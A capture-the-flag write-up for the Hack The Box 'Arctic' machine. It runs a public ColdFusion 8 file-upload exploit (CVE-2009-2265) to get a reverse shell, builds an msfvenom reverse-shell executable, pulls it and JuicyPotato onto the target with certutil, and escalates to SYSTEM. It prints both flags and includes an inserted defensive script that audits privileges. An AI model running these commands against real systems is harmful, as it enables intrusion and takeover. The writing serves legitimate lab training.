
HTB Arctic done

Arctic

OS:

Windows

Technology:

Adobe Coldfusion 8

IP Address:

10.129.129.212

Open ports:

135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  http    JRun Web Server
49154/tcp open  msrpc   Microsoft Windows RPC

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.209.235_nmap 10.129.209.235 ; cat 10.129.209.235_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-18 13:52 UTC
Nmap scan report for 10.129.209.235
Host is up (0.043s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  http    JRun Web Server
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Open website: http://10.129.128.247:8500/

Find software: Adobe Coldfusion 8

http://10.129.128.247:8500/cfdocs/dochome.htm

Exploit: [ExploitDev Journey #1 | CVE-2009-2265 | ColdFusion 8.0.1 - Arbitrary File Upload / RCE](https://github.com/0xConstant/CVE-2009-2265)

Download exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ git clone https://github.com/0xConstant/CVE-2009-2265.git
Cloning into 'CVE-2009-2265'...
remote: Enumerating objects: 36, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 36 (delta 9), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (36/36), 13.31 KiB | 801.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.

Run exploit - revshell

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Arctic/CVE-2009-2265]
└─$ python3 exploit.py http://10.129.110.154:8500 10.10.14.127 80 
[ + ] Upload successful, uploaded to:
[>>>] http://10.129.110.154:8500/userfiles/file/loKWjsFqLY.jsp
[...] Opening the shell, hold your beer...
[***] Check your listener!
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Arctic/CVE-2009-2265]
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.127] from (UNKNOWN) [10.129.110.154] 49183
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami /all
whoami /all

USER INFORMATION

User Name    SID                                          
============ =============================================
arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000

Read flag: user.txt

C:\ColdFusion8\runtime\bin>cd C:\Users
cd C:\Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users

22/03/2017  09:00       <DIR>          .
22/03/2017  09:00       <DIR>          ..
22/03/2017  08:10       <DIR>          Administrator
14/07/2009  06:57       <DIR>          Public
22/03/2017  09:00       <DIR>          tolis
               0 File(s)              0 bytes
               5 Dir(s)   1.433.792.512 bytes free

C:\Users>cd tolis\Desktop
cd tolis\Desktop

C:\Users\tolis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users\tolis\Desktop

22/03/2017  09:00       <DIR>          .
22/03/2017  09:00       <DIR>          ..
20/11/2024  12:27                   34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   1.404.567.552 bytes free

C:\Users\tolis\Desktop>whoami /all
whoami /all

USER INFORMATION
----------------

User Name    SID                                          
============ =============================================
arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Users\tolis\Desktop>ipconfig 
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.110.154
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Users\tolis\Desktop>type user.txt
type user.txt
741a46e19960edefeb1d58eca0717ccd

C:\Users\tolis\Desktop>

Privilege Escalation

Prepare revshell

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.127 lport=135 -f exe -o rev.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: rev.exe

Download JuicyPotato.exe and rev.exe

C:\Users\tolis\Desktop>certutil.exe -urlcache -split -f "http://10.10.14.127/JuicyPotato.exe" JuicyPotato.exe
certutil.exe -urlcache -split -f "http://10.10.14.127/JuicyPotato.exe" JuicyPotato.exe
****  Online  ****
  000000  ...
  054e00
CertUtil: -URLCache command completed successfully.

C:\Users\tolis\Desktop>certutil.exe -urlcache -split -f "http://10.10.14.127/rev.exe" rev.exe
certutil.exe -urlcache -split -f "http://10.10.14.127/rev.exe" rev.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.103.111 - - [18/Nov/2024 20:40:03] "GET /JuicyPotato.exe HTTP/1.1" 200 -
10.129.103.111 - - [18/Nov/2024 20:40:03] "GET /JuicyPotato.exe HTTP/1.1" 200 -
10.129.103.111 - - [18/Nov/2024 20:40:25] "GET /rev.exe HTTP/1.1" 200 -
10.129.103.111 - - [18/Nov/2024 20:40:27] "GET /rev.exe HTTP/1.1" 200 -

Start JuicyPotato

C:\Users\tolis\Desktop>JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -a "/c C:\Users\tolis\Desktop\rev.exe"
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -a "/c C:\Users\tolis\Desktop\rev.exe"
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337
....
[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\Users\tolis\Desktop>
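JuicyPotato works here because the ColdFusion service context (arctic\tolis, see the whoami /all output above) holds SeImpersonatePrivilege, which token-abuse tools of the Potato family turn into a SYSTEM shell. The following audit script is an added example, not part of this writeup or of any tool it uses: it parses the PRIVILEGES INFORMATION section of `whoami /all` output (a constructed sample modelled on the one captured above) and flags enabled privileges that a web or service account should not need.

```python
import re

# Constructed sample in the layout of `whoami /all`, modelled on the output
# captured from the ColdFusion shell in this writeup (abridged).
SAMPLE = """\
USER INFORMATION
----------------

User Name    SID
============ =============================================
arctic\\tolis S-1-5-21-2913191377-1678605233-910955532-1000


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a compromised service account impersonate a SYSTEM
# token; a web application's service account rarely needs either of them.
TOKEN_ABUSE_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_privileges(text):
    """Return {privilege_name: state} parsed from the PRIVILEGES INFORMATION section."""
    privs = {}
    in_section = False
    for line in text.splitlines():
        if line.startswith("PRIVILEGES INFORMATION"):
            in_section = True
            continue
        if not in_section:
            continue
        # Name column, free-text description, then the State column at the end.
        m = re.match(r"^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def audit(text):
    """Sorted list of enabled token-abuse privileges; non-empty means a finding."""
    privs = parse_privileges(text)
    return sorted(p for p, s in privs.items() if p in TOKEN_ABUSE_PRIVS and s == "Enabled")


if __name__ == "__main__":
    print("risky privileges enabled:", audit(SAMPLE) or "none")
```

Run the script against the saved output of `whoami /all` from each service account; the fix for a finding is to run the service under an account without that privilege (or a virtual/managed service account) and to keep the application patched so the shell never lands in the first place.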
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Arctic]
└─$ netcat -lvnp 135
listening on [any] 135 ...
connect to [10.10.14.127] from (UNKNOWN) [10.129.103.111] 49392
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Read flag: root.txt

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users\Administrator\Desktop

22/03/2017  09:02       <DIR>          .
22/03/2017  09:02       <DIR>          ..
20/11/2024  05:52                   34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   1.431.629.824 bytes free

C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.103.111
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Users\Administrator\Desktop>type root.txt
type root.txt
43a09734ba74ee1798fc33ec3083ebca

C:\Users\Administrator\Desktop>

References

[ExploitDev Journey #1 | CVE-2009-2265 | ColdFusion 8.0.1 - Arbitrary File Upload / RCE](https://github.com/0xConstant/CVE-2009-2265)

[RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer)

Lessons Learned
